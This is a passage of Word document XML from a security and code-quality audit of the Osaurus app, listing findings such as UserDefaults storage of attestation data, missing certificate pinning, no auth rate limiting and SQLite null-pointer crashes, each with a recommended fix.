          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Pinned Revisions Prevent Security Updates</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Packages/OsaurusCore/Package.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 11-19)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">mlx-swift and VecturaKit use hardcoded git revisions instead of semantic version ranges. This blocks automatic security patch adoption and makes the upgrade path opaque.</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Tag releases on the forks and use semantic version ranges. Document why specific revisions are pinned if exact commits are required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#5  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Makefile Silent cp Failure</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Makefile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 38)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The cp command that embeds the CLI binary into the app bundle has no existence check on the source file. If the CLI build silently fails, make app succeeds but produces an incomplete app bundle.</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Add explicit file existence check before cp. Print diagnostic error with expected path on failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#6  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Empty Settings Scene</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App/osaurus/osaurusApp.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 22-24)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Settings { EmptyView() } opens a blank window on Cmd+comma. This is worse UX than not registering a Settings scene at all.</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Either implement a real SettingsView or remove the Settings scene entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Networking &amp; Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The HTTP server, relay tunnel, cryptographic identity system, API key management, and authentication flow were audited for vulnerabilities, race conditions, and cryptographic correctness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#7  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Device Key ID Stored in Unencrypted UserDefaults</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Identity/DeviceKey.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 28-32)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The App Attest key ID is persisted in plaintext UserDefaults. While the private key stays in Secure Enclave, the exposed key ID enables attackers to enumerate valid device attestation identifiers.</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Store the key ID in Keychain with kSecAttrAccessible = kSecAttrAccessibleWhenUnlockedThisDeviceOnly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#8  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Monotonic Counter in Unencrypted UserDefaults</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Identity/CounterStore.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 17-22)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The anti-replay counter is persisted to unencrypted UserDefaults. An attacker with filesystem access can roll back the counter and replay API requests.</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Persist the counter to encrypted Keychain storage. Add server-side counter validation that rejects non-advancing values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#9  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Relay URL Lacks Certificate Pinning</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Networking/RelayTunnelManager.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 65)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The WebSocket connection to wss://agent.osaurus.ai uses DNS resolution without certificate pinning. A DNS hijack or MITM attack could redirect authentication traffic to a malicious relay.</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Implement certificate pinning by validating the server certificate public key hash. Use URLSessionDelegate with custom trust evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#10  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">WebSocket Reconnection Race Conditions</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Networking/RelayTunnelManager.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 74-80, 598-624)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection state uses @Published booleans instead of a state machine. Multiple reconnect triggers (timeout + manual) can execute concurrently, creating duplicate WebSocket connections.</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Replace boolean flags with an enum state machine (connecting/connected/disconnected). Ensure state transitions are atomic and guarded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#11  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">No Rate Limiting on Auth Failures</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Networking/HTTPHandler.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 144-192)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Invalid access keys return 401 without rate limiting. Attackers can brute-force token formats without throttling.</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Add per-IP rate limiting: 5 auth failures per minute triggers a 60-second backoff.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#12  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Weak Software Device ID (32-bit Entropy)</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Identity/DeviceKey.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 96-98)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The fallback software device ID uses only 4 bytes (32 bits) of entropy via SecRandomCopyBytes. This is brute-forceable in seconds on modern hardware.</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Increase to at least 16 bytes (128 bits) of entropy for the software device ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#13  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Bonjour Leaks Agent Crypto Address</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Networking/BonjourAdvertiser.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 80-105)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The mDNS TXT record includes the agent crypto address in plaintext, allowing any device on the local network to identify and target specific Osaurus agents.</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Make Bonjour advertisement opt-in per agent. Omit the crypto address from TXT records by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#14  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[LOW] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Missing CORS Whitelist Validation</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Networking/HTTPHandler.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 83-84)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS headers are computed without validating the Origin header against a whitelist, potentially allowing cross-origin requests from malicious sites.</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Implement strict CORS origin whitelist. Default to same-origin only unless explicitly configured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Memory &amp; Storage Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The SQLite database layer, memory service, context assembler, and data models were audited for data integrity, query safety, concurrency, and performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#15  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Null Pointer Dereference in SQLite Column Reading</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Storage/MemoryDatabase.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 1058-1072)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple String(cString: sqlite3_column_text()) calls lack null checks. sqlite3_column_text() returns NULL for NULL columns; passing this to String(cString:) crashes the application immediately.</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Use the safe pattern: sqlite3_column_text(stmt, N).map { String(cString: $0) } for all column reads. Apply consistently across all read functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#16  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Race Condition in MemoryService Actor</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Services/Memory/MemoryService.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 22-24, 138-166)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Dictionary mutations (summaryTasks, activeConversation, conversationSessionDates) in recordConversationTurn() can interleave between multiple simultaneous calls within the actor, since the function awaits between mutations.</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Group all dictionary reads and mutations into a single synchronous method. Perform all state changes before any await point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
